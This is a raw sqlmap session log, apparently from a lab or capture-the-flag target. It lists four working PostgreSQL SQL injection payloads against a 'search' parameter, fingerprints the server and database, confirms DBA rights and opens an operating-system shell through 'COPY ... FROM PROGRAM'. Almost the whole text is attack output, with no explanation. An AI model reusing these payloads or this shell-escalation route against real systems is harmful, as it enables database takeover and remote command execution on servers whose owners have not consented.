        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:14:49 /2023-09-10/

[01:14:49] [INFO] parsing HTTP request from 'dash.req'
[01:14:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=ls' AND (SELECT (CASE WHEN (2587=2587) THEN NULL ELSE CAST((CHR(114)||CHR(98)||CHR(100)||CHR(103)) AS NUMERIC) END)) IS NULL-- SiAk

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=ls' AND 4180=CAST((CHR(113)||CHR(120)||CHR(106)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (4180=4180) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(113)||CHR(118)||CHR(113)) AS NUMERIC)-- iVuS

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=ls';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=ls' AND 4329=(SELECT 4329 FROM PG_SLEEP(5))-- YYnP
---
[01:14:50] [INFO] testing PostgreSQL
[01:14:50] [INFO] confirming PostgreSQL
[01:14:50] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[01:14:50] [INFO] fingerprinting the back-end DBMS operating system
[01:14:50] [INFO] the back-end DBMS operating system is Linux
[01:14:50] [INFO] testing if current user is DBA
[01:14:51] [INFO] retrieved: '1'
[01:14:51] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[01:14:51] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> 